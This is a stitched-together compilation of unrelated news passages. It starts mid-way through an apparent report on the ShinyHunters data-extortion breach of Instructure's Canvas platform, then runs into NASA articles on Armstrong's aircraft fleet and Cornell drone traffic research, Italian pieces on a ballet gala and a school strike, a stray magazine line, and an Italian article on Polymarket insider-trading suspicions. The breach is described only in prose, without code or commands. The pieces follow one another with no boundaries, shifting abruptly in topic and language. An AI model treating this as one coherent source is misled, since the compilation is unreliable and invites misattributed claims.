While the data stolen by ShinyHunters may or may not contain particularly sensitive information (ShinyHunters claims it includes several billion private messages among students and teachers, as well as names, phone numbers and email addresses), this attack could hardly have come at a worse time for Instructure: Many of the affected schools and universities are in the middle of final exams, and a prolonged outage could be highly damaging for the company.
The extortion message that greeted countless Canvas users today advised the affected schools to negotiate their own ransom payments to prevent the publication of their data — regardless of whether Instructure decides to pay.
“ShinyHunters has breached Instructure (again),” the extortion message read. “Instead of contacting us to resolve it they ignored us and did some ‘security patches.'”
A source close to the investigation who was not authorized to speak to the press told KrebsOnSecurity that a number of universities have already approached the cybercrime group about paying. The same source also pointed out that the ShinyHunters data leak blog no longer lists Instructure among its current extortion victims, and that the samples of data stolen from Canvas customers were removed as well. Data extortion groups like ShinyHunters will typically only remove victims from their leak sites after receiving an extortion payment or after a victim agrees to negotiate.
Dipan Mann, founder and CEO of the security firm Cloudskope, slammed Instructure for referring to today’s outage as a “scheduled maintenance” event on its status page. Mann said Shiny Hunters first demonstrated they’d breached Instructure on May 1, prompting Instructure’s Chief Information Security Officer Steve Proud to declare the following day that the incident had been contained. But Mann said today’s attack is at least the third time in the past eight months that Instructure has been breached by ShinyHunters.
In a blog post today, Mann noted that in September 2025, ShinyHunters released thousands of internal University of Pennsylvania files — donor records, internal memos, and other confidential materials — through what the Daily Pennsylvanian and other outlets later determined was, in part, a Canvas/Instructure-mediated access path.
“Penn was the named victim,” Mann wrote. “Instructure was the mechanism. The incident was treated as a Penn-specific story by most of the national press and quietly handled by Instructure as a customer-specific matter. That framing was wrong then. It is dramatically more wrong in light of the May 2026 events, which now look like the planned escalation of an attack pattern that ShinyHunters had been working against Instructure’s environment for at least eight months prior. The September 2025 Penn breach was the proof of concept. The May 1, 2026 incident was the production run. The May 7, 2026 recompromise was ShinyHunters demonstrating publicly that the May 2 ‘containment’ did not happen.”
In February, a ShinyHunters spokesperson told The Daily Pennsylvanian that Penn failed to pay a $1 million ransom demand. On March 5, ShinyHunters published 461 megabytes worth of data stolen from Penn, including thousands of files such as donor records and internal memos.
ShinyHunters is a prolific and fluid cybercriminal group that specializes in data theft and extortion. They typically gain access to companies through voice phishing and social engineering attacks that often involve impersonating IT personnel or other trusted members of a targeted organization.
Last month, ShinyHunters relieved the home security giant ADT of personal information on 5.5 million customers. The extortion group told BleepingComputer they breached the company by compromising an employee’s Okta single sign-on account in a voice phishing attack that enabled access to ADT’s Salesforce instance. BleepingComputer says ShinyHunters recently has taken credit for a number of extortion attacks against high-profile organizations, including Medtronic, Rockstar Games, McGraw Hill, 7-Eleven and the cruise line operator Carnival.
The attack on Canvas customers is just one of several major cybercrime campaigns being launched by ShinyHunters at the moment, said Charles Carmakal, chief technology officer at the Google-owned Mandiant Consulting. Carmakal declined to comment specifically on the Canvas breach, but said “there are multiple concurrent and discrete ShinyHunters intrusion and extortion campaigns happening right now.”
Cloudskope’s Mann said what happens next depends largely on whether Instructure’s customers — the universities, K-12 districts, and education ministries paying for Canvas — choose to apply pressure or absorb the breach quietly.
“The history of education-vendor incidents suggests the path of least resistance is the second one,” he concluded.
Update, May 8, 11:05 a.m. ET: Instructure has published an incident update page that includes more information about the breach. Instructure said its Canvas portal is functioning normally again, and that the hackers exploited an issue related to Free-for-Teacher accounts.
“This is the same issue that led to the unauthorized access the prior week,” Instructure wrote. “As a result, we have made the difficult decision to temporarily shut down Free-for-Teacher accounts. These accounts have been a core part of our platform, and we’re committed to resolving the issues with these accounts.”
Instructure said affected organizations were notified on May 6.
“If your organization is affected, Instructure will contact your organization’s primary contacts directly,” the update states. “Please don’t rely on third-party lists or social media posts naming potentially affected organizations as those lists aren’t verified. Instructure will confirm validated information through direct outreach to all affected organizations.”
Update, May 11, 10:16 p.m. ET: Instructure posted an update saying they paid their extortionists in exchange for a promise to destroy the stolen data. “The data was returned to us,” the update reads. “We received digital confirmation of data destruction (shred logs). We have been informed that no Instructure customers will be extorted as a result of this incident, publicly or otherwise.”
3 min read
NASA’s home for experimental flight is welcoming more flyers to its already high-performing fleet as it continues to support science and aeronautics test missions – continuing the legacy of pioneers like Neil Armstrong.
NASA’s Armstrong Flight Research Center in Edwards, California, added multiple aircraft this year: two F-15s supersonic jets, a Pilatus PC-12 utility plane, and a T-34 turboprop trainer, which the center will use to support the agency’s advancement of aerospace research.
Throughout the center’s history, pilots have flown everything from large aircraft like the 747 Shuttle Carrier Aircraft and rocket-powered airplanes like the X-15 to high-speed repurposed fighter jets like the F-18. And after almost 80 years, flight research is still going strong in the desert today.
“Armstrong has a rich history of flight research, but it’s the multidimensional skills of the people we have here, and the knowledge they’ve built to handle very unique aircraft maintenance and modifications, that stands out,” said Darren Cole, capabilities manager for the Flight Demonstrations and Capabilities project at NASA Armstrong.
Darren Cole
Capabilities Manager at NASA Armstrong
The center plays a pivotal role in worldwide airborne science missions, flying scientists and equipment from NASA, other government agencies, industry, and academia to collect measurements such as air pollution levels, glacier melt trends, and wildland fire mapping.
Scientists can manage experiments in real time aboard flying laboratories like the NASA ER-2, to collect important data with the help of Armstrong’s pilots and airborne science team.
“We all come together to make the science happen,” said Matt Berry, airborne research platforms branch chief at NASA Armstrong. “It is the agility of the Armstrong team that allows us to collaborate with scientists, get their equipment onboard, and to fly them to areas where they need to collect data.”
The center sits on Rogers Dry Lake, a 44-square-mile slat flat area used for aviation research and test operations. Rogers and the adjacent Rosamond Dry Lake have seen everything from space shuttle landings to emergency test flight recoveries. The Rogers lakebed continues to serve as an important piece of Armstrong’s test missions.
For NASA Armstrong, it all started with the first attempt by a human to fly faster than the speed of sound in the Bell X-1. In 1946, 13 employees from NASA’s predecessor agency, the National Advisory Committee for Aeronautics (NACA), arrived at what was then known as Muroc Army Airfield to prepare for the X-1 tests. A year later, NACA’s Muroc Flight Test Unit was established as a permanent facility at the airfield.
The center has gone by several names over the years, most recently changing from NASA’s Dryden Flight Research Center to NASA Armstrong in 2014. But its legacy has never shifted: The Bell X-1E, the last of the X-1 series of aircraft, now sits in front of NASA Armstrong, welcoming the newest test pilots, engineers, scientists, explorers, and dreamers. And they’re using the aircraft of today to break new barriers.
“I don’t think there is another place in the world with a more diverse fleet of aircraft. We have everything from a low-altitude powered glider to ER-2s, which are flying at high altitudes, and a multitude of aircraft in between,” Cole said.
From sourcing rare components to machining custom parts in-house, NASA Armstrong’s teams transform these aircraft into research workhorses. The center continues its crucial role in leading aeronautics testing, Earth science research, and supporting government and industry partners.
6 min read
A team of Cornell University students are turning heads within industry and the federal government with the results of their research into creating a national air transportation management system in which thousands of drones could safely operate together.
NASA is sponsoring their work through the University Student Research Challenge (USRC), which provides grants to college students interested in helping the agency realize its aeronautical research goals.
“Looking at new traffic management systems for drones is not new,” said Mehrnaz Sabet, a doctoral student in the field of information science who serves as principal investigator on the grant and leads the Cornell team. “In fact, NASA has led that effort for years.”
Now, through USRC, NASA is giving Sabet and her team the chance to offer up innovative approaches to drone safety by managing their movements in the air, taking advantage of their young minds and fresh ideas.
The ultimate benefit of Cornell’s research in this area is the full realization of advanced air mobility, an area of industry focus that includes everything from urban flying taxis, more robust disaster response aircraft, and hot fresh pizza delivered right to your door.
The work also underscores the value NASA places on maturing cutting-edge technologies and helping to develop its future workforce through initiatives like USRC.
“Sabet and her team have demonstrated versatile skills involving software, algorithms, hardware, sensors development, laboratory tests, simulations, and actual flight tests – a rare combination,” said Parimal Koperdekar, acting director of NASA’s Airspace Operations and Safety Program.
Currently, drone operators must file plans that fully describes the intended flight path of the drone with a traffic management service. Those plans are checked with others to ensure there will be no collisions – what Sabet calls strategic deconfliction.
The challenge is that today’s air traffic management system is limited in its ability to handle the growing number of aircraft taking to the sky. Adding thousands of drones to the mix during the coming years risks over burdening the system, Sabet said.
What is needed in the air is essentially what we have on the ground – where millions of people drive on a road every day, she said.
As a driver you might know your whole “trajectory,” or the path you’d follow to reach your destination. But you would never coordinate your plan with every other driver on the road before you leave. Instead, traffic laws and infrastructure such as stop lights and traffic signs allow you to deconflict with other cars as you go.
Drone operators will still have to file flight plans saying where they intend to go, but the idea is to incorporate that car-like flexibility into drone operating systems, allowing them to be adaptable during their journeys.
“We need to ensure all these different types of drones can tactically deconflict with each other so that it is safe for them to operate like cars do on the ground. And that missing piece – tactical deconfliction – is at the center of our project,” Sabet said.
The key to the Cornell team’s research is the notion of integrating a simulated world with the real one to test and demonstrate how drones can learn to adapt to potentially hazardous conditions and make necessary corrections in their flight path on their own.
Knowing they could not go out and fly 100 drones at the same time to test their ideas for tactical deconfliction, the students decided to create an entirely virtual urban world to evaluate different high-volume traffic models, separation algorithms, and related data.
“Our first year of the project went into adapting and scaling that simulation engine and it all went very well,” Sabet said. “But we didn’t want to stick to a simulation. We wanted to see how the simulation translated to the real world, which mattered more.”
Still hampered by the limitations of how many drones they could operate and where they could fly – not many and basically in the middle of nowhere – they sought the best of both worlds, real and imagined.
“What we wound up doing was to embed the simulation into a real drone, so the drone thought it was flying in a dense urban environment although it was actually flying out in an open field where there wasn’t a real city in sight,” Sabet said.
drone flight test
This allowed the team to try out different traffic management tools and evaluate how drones might coordinate course corrections and avoid collisions with each other.
During the past year, they’ve taken the idea further by flying two real drones in the real world, each running the real-time simulation on board, allowing them to coordinate and “see” both simulated traffic and each other within the integrated test environment.
“We would then intentionally put them on a direct collision course to stress-test the detect and avoid and coordination models and see how well they react and coordinate the drone’s maneuvers to avoid hitting each other,” Sabet said.
Their success struck a chord with NASA experts in Unmanned Aircraft Systems Traffic Management (UTM).
“What’s impressive is that Cornell’s study included over 10,000 runs involving more than one million trajectories, and over 200,000 hours of experimentation to understand how multi-agent decentralized coordination would safely take place,” Kopardekar said.
Industry and the Federal Aviation Administration have also responded positively to this research and its potential. The team was asked to use its infrastructure and technology to virtually recreate an incident in 2025 in which a pair of drones collided with a stationary crane in Arizona. The team also showed how the accident could have been prevented.
The team was also asked to simulate recent, real-world fires in California to showcase how drones could better coordinate their movements both to provide situational awareness for public safety officials on the ground and to stay clear of fire-suppressing air tankers.
And according to the Cornell team, the FAA is interested in applying the project’s mix of virtual and real-world testing to evaluate drone operations under increasing levels of operational complexity.
“This kind of mixed-reality type of operational complexity enables them to test drone operations in a way that was not possible before,” Sabet said.
Thanks to NASA’s support through USRC, the Cornell team will continue to expand their capabilities and manage increasingly complex advanced air mobility operations.
“Our goal is to build the foundational systems that enable safe, large-scale autonomy in the skies,” Sabet said.
USRC is an opportunity within NASA’s Transformative Aeronautics Concepts Program under the agency’s Aeronautics Research Mission Directorate.
Jim Banke is a veteran aviation and aerospace communicator with more than 40 years of experience as a writer, producer, consultant, and project manager based at Cape Canaveral, Florida. He is part of NASA Aeronautics' Strategic Communications Team and is Managing Editor for the Aeronautics topic on nasa.gov. In 2007 he was recognized with a Distinguished Public Service Medal, NASA's highest honor for a non-government employee.
L’eleganza della danza torna a incantare il pubblico nel 2026 con Roberto Bolle and Friends,
il celebre gala internazionale che ogni anno riunisce sul palco alcune delle stelle più importanti del balletto mondiale.
Ancora una volta protagonista sarà Roberto Bolle,
tra i danzatori italiani più conosciuti e stimati nel panorama internazionale.
La tournée prenderà il via da Milano, dove lo spettacolo
sarà in programma dal 21 al 24 maggio 2026 presso il Teatro Arcimboldi.
In seguito, la produzione farà tappa anche in altre città italiane, confermando il grande successo di uno degli eventi più attesi dagli appassionati di danza.
Come da consuetudine, Roberto Bolle and Friends porterà in scena un mix di tecnica,
raffinatezza ed emozione attraverso uno spettacolo esclusivo.
Sul palco si esibiranno étoile e primi ballerini provenienti dai teatri più prestigiosi del mondo.
Il pubblico potrà inoltre ammirare coreografie classiche e contemporanee, create per esaltare tutta la potenza espressiva dell’arte della danza.
Dopo i grandi risultati ottenuti nelle edizioni precedenti, anche il 2026 si prospetta come un anno significativo per questo format. Roberto Bolle si conferma infatti una figura di riferimento a livello internazionale, grazie a una carriera che lo ha visto protagonista tra il Teatro alla Scala e l’American Ballet Theatre.
Anche nel 2026, Roberto Bolle and Friends si conferma quindi un appuntamento capace di avvicinare il grande pubblico al mondo della danza. Un’opportunità unica per assistere a uno spettacolo di altissimo profilo nel cuore di Milano.
TICKETS :
https://www.ticketone.it/artist/roberto-bolle/roberto-bolle-and-friends-3623474/
Credits Photo Pagina Facebook di Roberto Bolle
L'articolo Roberto Bolle and Friends a Milano proviene da InfoMilano.news.
MANIFESTAZIONE A LIVORNO ORE 9:30 PIAZZA CAVOUR
Il 7 maggio lavoratrici e lavoratori della scuola incroceranno le braccia insieme a studentesse e studenti, con manifestazioni territoriali in decine di città. L'appuntamento a Roma è alle ore 9:00 al MIM in viale Trastevere.
Lo sciopero, proclamato anche per il 6 maggio per garantire la massima copertura al personale, chiama al boicottaggio delle prove INVALSI e raccoglie l'invito alla mobilitazione dell'assemblea internazionale giovanile We do not enlist.
Scioperiamo contro la militarizzazione della scuola e della società, contro la leva obbligatoria, contro la riforma degli istituti tecnici e professionali che consegna la formazione delle classi popolari direttamente nelle mani delle imprese, contro le nuove linee guida dei licei e contro un rinnovo contrattuale che propone salari vergognosi mentre l'inflazione cresce, trascinata dai costi di guerre che non abbiamo voluto e non vogliamo.
La scuola di Valditara non è la nostra. Le sue politiche reazionarie, classiste, repressive e di militarizzazione sono nemiche di studenti e lavoratori. Riprendiamoci spazi di democrazia e di organizzazione politica e sociale a partire dalle scuole, lottiamo per una scuola statale al servizio di chi la fa e la vive. Cancelliamo quasi quarant'anni di controriforme.
Né "capitale umano" né manodopera ideologizzata!
Scioperiamo perché la scuola non deve essere ridotta a produttrice di "capitale umano" da immettere sul mercato del lavoro secondo le logiche della competitività e del profitto. Rifiutiamo la retorica delle competenze, strumento ideologico con cui si svuotano i saperi critici e si addestrano menti flessibili, adattabili, sfruttabili. Rifiutiamo ancora una volta la formazione scuola-lavoro, sfruttamento di lavoro minorile travestito da esperienza formativa, che è già costata la vita a troppi giovani.
In questo quadro si innesta la riforma degli istituti tecnici e professionali. I nuovi percorsi 4+2 e i nuovi quadri orari piegano i programmi alle esigenze produttive dei territori, erodono la formazione generale e critica, e avviano gli studenti delle classi popolari – quelli che storicamente frequentano i tecnici e i professionali – a diventare manodopera qualificata su misura per il distretto industriale di turno. Non è orientamento, è selezione di classe. Non è innovazione didattica, è privatizzazione strisciante del sapere.
Le nuove Indicazioni per i Licei: l'altra faccia dello stesso progetto classista.
Mentre i tecnici e i professionali vengono consegnati alle imprese, il 22 aprile il ministero ha pubblicato il testo delle nuove Indicazioni Nazionali per i Licei: l'altra metà del disegno. Non un'operazione separata, ma il complemento ideologico della stessa controriforma. Ai figli delle classi popolari avviati nei "licei agrari", "chimici" o "tessili" – la trovata semantica con cui Valditara annuncia di voler smantellare la distinzione formale tra licei e tecnici – si vuole consegnare la formazione professionalizzante; ai licei tradizionali, frequentati in gran parte dalla borghesia e dai ceti medi, si destina invece la costruzione di una "coscienza" identitaria dichiaratamente eurocentrica e nazionalista.
La centralità della storia dell'Italia e dell'Occidente, la soppressione della geostoria, la ridefinizione dell'inclusione come "architrave della cultura occidentale moderna": non sono scelte didattiche neutre, ma una precisa operazione politica. Si riscrive il canone in chiave identitaria, si restringe lo sguardo storico proprio mentre si chiede ai nostri ragazzi di diventare carne da cannone in guerre globali, si svuotano gli strumenti critici per leggere il presente – il colonialismo, le migrazioni, il genocidio in corso – riducendoli a marginalità rispetto a un nucleo "euro-occidentale" presentato come depositario universale di diritti e civiltà. È la stessa narrazione bellicista che giustifica l'aumento delle spese militari e la riduzione del welfare, trasferita dentro i programmi scolastici. L'irruzione dell'intelligenza artificiale "in attuazione della Legge 132/2025 e dell'AI Act", senza alcuna formazione strutturata per il personale e senza investimenti reali, completa il quadro: parole d'ordine modernizzanti su un impianto culturalmente regressivo.
E come già accaduto per le Indicazioni del primo ciclo, la "consultazione" è una farsa: il questionario predisposto dal ministero non prevede neanche l'opzione del parere negativo. La fase di ascolto è una messa in scena, come lo è la riforma stessa.
Tecnici e licei, dunque, non sono due capitoli distinti: sono il dritto e il rovescio dello stesso progetto. Una scuola che separa, che gerarchizza, che addestra i figli del lavoro al lavoro precario e i figli delle élite a una "missione di civiltà" funzionale alla retorica di guerra. Va respinta tutta intera.
Inclusione, salari, contratto
Scioperiamo per la scuola che include e non separa, capace di rispondere ai tagli agli organici di sostegno e ai servizi per gli alunni con disabilità previsti dal decreto legislativo 62/2024 – scelte di cinica contabilità fatte sulla pelle di studenti, famiglie e lavoratori, mentre i soldi pubblici vengono trasferiti all'industria militare. Rivendichiamo la stabilizzazione dei precari, l'internalizzazione degli educatori delle cooperative sociali, salari adeguati all'inflazione, un contratto degno.
Contro la leva, contro la guerra!
Davanti al rischio di escalation della guerra in Iran e alle sue ricadute globali, mentre il genocidio del popolo palestinese continua nel silenzio complice dei governi occidentali e delle complicità con lo Stato di Israele, dobbiamo riconnettere scuola e società reale. La scuola rischia di essere risucchiata nella spirale folle innescata dagli USA di Trump, con il silenzio-assenso degli altri governi occidentali, e di essere ridotta a funzione del processo di militarizzazione.
In molti paesi europei si è già reintrodotta o ci si avvia a reintrodurre la leva militare obbligatoria. Anche contro la leva dobbiamo scioperare: gli studenti non sono carne da cannone, non sono forza lavoro disponibile, non sono risorse umane da ottimizzare per l'economia di guerra. Il progetto di reintroduzione della coscrizione non è separabile dall'escalation bellica, dall'aumento delle spese per gli armamenti a scapito del welfare, dalla narrazione che vuole trasformare le nostre scuole in anticamere delle caserme.
Non a caso il 7 maggio sarà anche il giorno dello sciopero dei lavoratori portuali di USB contro la privatizzazione e la militarizzazione dei porti: una convergenza che riconnette i protagonisti delle mobilitazioni dello scorso autunno e dà forza a un progetto alternativo.
Il 7 maggio si sciopera. Studenti e lavoratori uniti, contro la guerra, contro la leva, contro la scuola classista di Valditara – tecnici e licei. Per una nuova scuola pubblica, statale, democratica e antifascista.
This month in Linux Voice.
“Hai ancora 90 minuti per aggiornare la notizia falsa. Se lo fai, risolverai in un attimo il problema più grave che ti sei creato in vita tua. E tra una settimana non ti ricorderai più di me”. Questo il messaggio che, secondo quanto riportato dal Washington Post, il corrispondente di guerra del The Times of Israel Emanuel Fabian ha ricevuto su WhatsApp cinque giorni dopo aver pubblicato un articolo in cui raccontava che un missile iraniano aveva colpito, senza ferire nessuno, un’area boschiva poco fuori la città di Beit Shemesh, alle porte di Gerusalemme. Una notizia piuttosto marginale che, però, ha reso il giornalista l’obiettivo di minacce e ritorsioni da parte di ignoti.
Come raccontato da lui stesso, nelle ore successive alla pubblicazione Fabian ha cominciato a ricevere via email messaggi in ebraico che gli intimavano di modificare l’articolo, suggerendo che l’incidente fosse stato provocato da un missile intercettato “i cui rottami e frammenti erano caduti nel luogo dell’impatto”. Con il passare dei giorni, i messaggi si sono intensificati e le lamentele hanno raggiunto anche X, dove alcuni utenti hanno commentato la notizia condivisa dal giornalista, chiedendo se davvero si fosse trattato di un missile o meno. Ed è stato solo allora che, a quanto pare, Fabian ha compreso le ragioni del clamore sollevato dalla notizia pubblicata giorni prima: gli account X che avevano avanzato la richiesta di precisazioni erano collegati a Polymarket, la più grande piattaforma di prediction market al mondo, dove gli utenti avevano puntato più di 14 milioni di dollari sulla possibilità che un attacco missilistico iraniano colpisse Israele il 10 marzo.
“Questa scommessa sarà vincente se l’Iran lancerà un attacco con droni, missili o aerei sul territorio israeliano nella data indicata, secondo l’ora di Israele. In caso contrario, la scommessa sarà perdente”, si legge chiaramente su Polymarket. Tuttavia, “i missili o i droni che vengono intercettati non saranno considerati sufficienti per una risoluzione ‘Sì’, indipendentemente dal fatto che atterrino sul territorio israeliano o causino danni”. Una clausola che spiega bene perché il giornalista del The Times of Israel abbia ricevuto tante richieste di modificare l’articolo pubblicato: se Fabian avesse precisato che l’incidente era stato provocato da un missile intercettato, infatti, chiunque avesse puntato sul “no” avrebbe riscosso una vincita considerevole.
Ma il giornalista non ha ceduto alle minacce e ha messo a rischio la propria sicurezza pur di riportare la verità. “Il tentativo di questi giocatori d’azzardo di farmi pressione affinché modificassi i miei articoli per fargli vincere la scommessa non ha avuto successo e non lo avrà”, ha dichiarato. “Tuttavia, temo che altri giornalisti potrebbero non comportarsi in modo altrettanto etico, se venisse loro promessa una parte delle vincite”. Nonostante il “lieto fine”, la storia di Emanuel Fabian ha contribuito ad accendere i riflettori su Polymarket, il mercato predittivo che si sta dimostrando particolarmente abile nell’anticipare gli eventi geopolitici più emblematici della nostra epoca. Ma come può una piattaforma digitale prevedere quali saranno le decisioni dei governi più potenti al mondo? Chi sono gli investitori che sostengono il progetto e traggono profitto dalle sue scommesse milionarie?
La storia di Polymarket comincia come buona parte delle vicende delle aziende tech più note al mondo: solo che al posto di un garage, ci troviamo in un appartamento nel cuore di New York. Qui, nel pieno della pandemia di Covid-19, il giovanissimo Shayne Coplan, appassionato di tecnologia e criptovalute, in soli tre mesi crea una piattaforma che risponda ad alcuni dei quesiti che lo attanagliano durante il lockdown: “Quando finirà tutto questo? Quando sarà pronto il vaccino? Quando finiranno le misure di restrizione?”.
E così nel 2020, ispirandosi ai mercati predittivi Augur e Gnosis, Coplan ha lanciato Polymarket, con l’obiettivo di fornire agli utenti una “fonte di informazione affidabile” contro la “disinformazione dilagante”. In quel momento, non sapeva che la sua piattaforma sarebbe diventata il mercato predittivo per eccellenza, e che gli avrebbe regalato il titolo di più giovane miliardario self-made al mondo. La strada per arrivare a questo risultato, come si può immaginare, è stata parecchio accidentata.
Nel gennaio del 2022 la Commodity Futures Trading Commission (CFTC) ha imposto a Polymarket il pagamento di una multa da 1,4 milioni di dollari e il blocco degli utenti statunitensi, per aver operato senza aver richiesto l’approvazione delle autorità di regolamentazione, come previsto dalla legge. Una sanzione che non ha fermato l’ascesa della piattaforma che, appena un paio di anni dopo, ha raggiunto i 3,6 miliardi di dollari di scommesse sulla corsa presidenziale tra Trump e Biden. Un successo breve, ma intenso. Appena otto giorni dopo l’elezione di Donald Trump, l’FBI ha infatti fatto irruzione nell’appartamento newyorkese di Sheyn Coplan e ne ha sequestrato tutti i dispositivi elettronici, nell’ambito di un’indagine volta a verificare – ancora una volta – se Polymarket consentisse agli utenti americani di piazzare scommesse senza licenza.
Dopo meno di un anno, la CFTC e il Dipartimento di Giustizia statunitensi hanno archiviato le indagini sul giovanissimo imprenditore, lasciandolo libero di godersi la sua ascesa. A luglio 2025, la piattaforma ha annunciato pubblicamente l’acquisizione da 112 milioni di dollari di QCX e QCXE, la holding di una borsa di derivati e una stanza di compensazione (l’infrastruttura che garantisce e regola le transazioni concluse sul mercato) autorizzate dalla Commodity Futures Trading Commission. “Ora, con l’acquisizione di QCEX, stiamo gettando le basi per riportare Polymarket a casa, rientrando negli Stati Uniti come piattaforma pienamente regolamentata e conforme che consentirà agli americani di scambiare le proprie opinioni”, ha commentato Coplan in quell’occasione, rassicurando (finalmente) gli utenti sulla legalità del suo mercato predittivo.
Una mossa strategica apprezzata dalla CFTC, che a settembre 2025 ha approvato ufficialmente l’attività di Polymarket nel mercato statunitense, proprio pochi giorni dopo l’ingresso di Donald Trump Jr. nel comitato consultivo della compagnia, in cui ha investito circa 10 milioni di dollari.
Nonostante questo percorso burrascoso, il progetto del giovane imprenditore di New York non ha mai modificato la sua natura. Sin dal lancio, Polymarket è una piattaforma in cui gli utenti possono scommettere su qualunque evento futuro – dall’elezione del presidente degli Stati Uniti alla data del matrimonio di Taylor Swift, dal ritorno di Gesù al prossimo conflitto geopolitico – semplicemente rispondendo sì o no ad alcune domande, accanto alle quali sono segnalate le probabilità di vincita, che variano mano a mano che gli utenti scommettono. “Si vince se si indovina. Si perde se si sbaglia”, ha chiosato Coplan in un’intervista a CBS News, spiegando il funzionamento semplice e intuitivo di Polymarket, che ha permesso agli utenti di guadagnare milioni di dollari nel corso degli anni.
Ma non sono soltanto i soldi a interessare l’imprenditore, quanto la possibilità di offrire alle persone uno strumento di informazione che sia il più chiaro possibile. Secondo Coplan, i mercati predittivi sono “lo strumento più accurato di cui disponiamo attualmente come esseri umani, almeno finché qualcuno non inventerà una sorta di sfera di cristallo superpotente”. L’idea è che – viste le ingenti somme di denaro in gioco – le persone siano incentivate a esprimere previsioni ponderate e informate, più di quanto farebbero in un tradizionale sondaggio. Una lettura che sembra trovare riscontro concreto nel successo del progetto.
Nella notte tra il 2 e il 3 gennaio 2026 gli Stati Uniti hanno attaccato il Venezuela, colpendo obiettivi militari e civili a Caracas e dintorni, e catturato il presidente Nicolás Maduro, accusato di narcotraffico e commercio illegale di armi. Appena cinque ore prima che le esplosioni scuotessero la capitale, su Polymarket un trader sconosciuto ha raddoppiato le puntate sull’invasione del Venezuela da parte degli Stati Uniti e sulla destituzione del presidente Maduro entro il 31 gennaio 2026, arrivando a guadagnare oltre 400mila dollari, con un ritorno sull’investimento pari a 12 volte la somma puntata.
Una vincita che ha attirato subito l’attenzione, alimentando i sospetti che il trader potesse aver ottenuto segretamente informazioni sull’operazione militare statunitense. Stando alla ricostruzione del Washington Post, l’account del trader è stato creato a dicembre 2025, e ha cominciato a scommettere su un probabile attacco degli Stati Uniti al Venezuela già nel corso del mese, quando ancora non c’erano notizie sul tema.
A destare sospetti, però, è il fatto che l’utente abbia puntato oltre 20mila dollari sull’ipotesi di un imminente attacco degli Stati Uniti al Venezuela lo stesso 2 gennaio, tra le 20.38 e le 21.58. Alle 22.46 dello stesso giorno, meno di un’ora dopo, Donald Trump ha autorizzato le operazioni militari statunitensi. Intorno all’una del 3 gennaio, i bombardamenti hanno cominciato a colpire Caracas, distruggendo indistintamente edifici governativi e quartieri residenziali. Alle 8.41 del mattino, il trader ha iniziato a incassare parte della sua vincita, pari a 410mila dollari. “È probabile che si tratti di un informatore interno. È una somma considerevole da investire, senza che ci siano molte notizie sul tema”, ha commentato Tre Upshaw, fondatore di Polysights, una startup che fornisce strumenti di analisi per i trader di Polymarket, inclusa una funzione per segnalare potenziali attività di insider trading.
A confermare questa ipotesi è un’indagine del Wall Street Journal, secondo cui l’amministrazione Trump avrebbe tenuto segreta l’operazione venezuelana, limitando la condivisione di informazioni a una ristretta cerchia di consiglieri di alto livello, per preservarne l’effetto sorpresa. Le notizie su un probabile attacco, quindi, potrebbero essere arrivate solo e soltanto dalle persone più vicine al presidente degli Stati Uniti. Non a caso, a seguito della notizia della scommessa di Polymarket relativa al caso Maduro, il deputato democratico Ritchie Torres ha presentato un disegno di legge per vietare ai funzionari governativi di piazzare scommesse sulla piattaforma di prediction market, sfruttando a proprio vantaggio informazioni che non sono di dominio pubblico. Una proposta ancora in attesa di approvazione, che alimenta i sospetti sul coinvolgimento dei membri dell’amministrazione Trump nel giro dei mercati predittivi.
L’attacco al Venezuela e la destituzione di Maduro non sono i soli eventi geopolitici a essere stati anticipati da Polymarket, instillando nei ricercatori e negli esperti di sicurezza il dubbio che qualcuno vicino al presidente Donald Trump possa aver utilizzato informazioni riservate per piazzare scommesse sulla piattaforma. Anche la guerra in Iran, infatti, è stata un tema centrale per le previsioni di Polymarket. Secondo quanto riferito dalla società di analisi Bubblemaps SA, sei account di trader anonimi hanno guadagnato 1,2 milioni di dollari scommettendo su un attacco statunitense all’Iran entro la fine di febbraio, e mettendo così in evidenza uno schema ricorrente tra gli investitori della piattaforma.
Proprio come accaduto nel caso di Maduro, anche questa volta gli account in questione sono stati creati nei giorni precedenti la scommessa, e hanno piazzato le loro puntate poche ore prima che i bombardamenti colpissero Teheran, guadagnando cifre da capogiro all’indomani dell’attacco statunitense. La questione, proprio come accaduto con il Venezuela, ha suscitato subito scalpore e indignazione, anche nella classe politica americana. “È assurdo che ciò sia legale”, ha commentato in un post su Bluesky il senatore Chris Murphy. “Le persone vicine a Trump stanno traendo profitto dalla guerra e dalla morte”.
E non finisce qui. Nelle ultime settimane di marzo, gli account di ben otto trader – tutti creati attorno al 21 marzo – hanno scommesso un totale di 70mila dollari su una possibile tregua tra Stati Uniti e Iran, che sarebbe valsa loro la vincita di ben 820mila dollari. A suscitare sospetti sulle puntate, come ha riferito l’ex ricercatore di CoinTelegraph Ben Yorke, è stato il fatto che i suddetti account sembrassero “decisamente appartenere a qualcuno in possesso di informazioni confidenziali”.
Inoltre, da un’analisi più approfondita è risultato che alcuni di questi account potessero appartenere a un unico investitore anonimo, che avrebbe preferito utilizzare portafogli digitali diversi per le sue scommesse sulla piattaforma. “In genere, quando si è in presenza di una frammentazione dei portafogli e di tentativi deliberati di occultare l’identità, si possono ipotizzare due scenari diversi”, ha commentato Yorke. “O è un investitore importante che cerca di proteggere la propria posizione dall’impatto del mercato, oppure è insider trading”. A rendere più che plausibile quest’ultima ipotesi c’è stato l’aumento evidente della probabilità di una tregua tra USA e Iran prima del 31 marzo, la cui valutazione su Polymarket è passata dal 6% del 21 marzo al 24% del 23 marzo.
Eppure, nonostante i segnali evidenti, la piattaforma di Coplan ha sempre cercato di mantenere il focus sull’obiettivo informativo. “La promessa dei mercati predittivi è quella di sfruttare la conoscenza collettiva per creare previsioni accurate e imparziali sugli eventi più importanti per la società”, si legge nella nota che accompagna tutte le scommesse relative all’Iran presenti su Polymarket . “Questa capacità è particolarmente preziosa in tempi strazianti come quelli odierni. Dopo aver discusso con le persone direttamente colpite dagli attacchi, che avevano decine di domande, ci siamo resi conto che i mercati predittivi potevano dare loro le risposte di cui avevano bisogno, in un modo in cui i telegiornali e X non potevano fare”. Un’affermazione decisamente conveniente, che permette alla piattaforma di continuare a trarre profitto dalle guerre e dalla morte di migliaia di persone. E ai trader più informati di scommetterci.
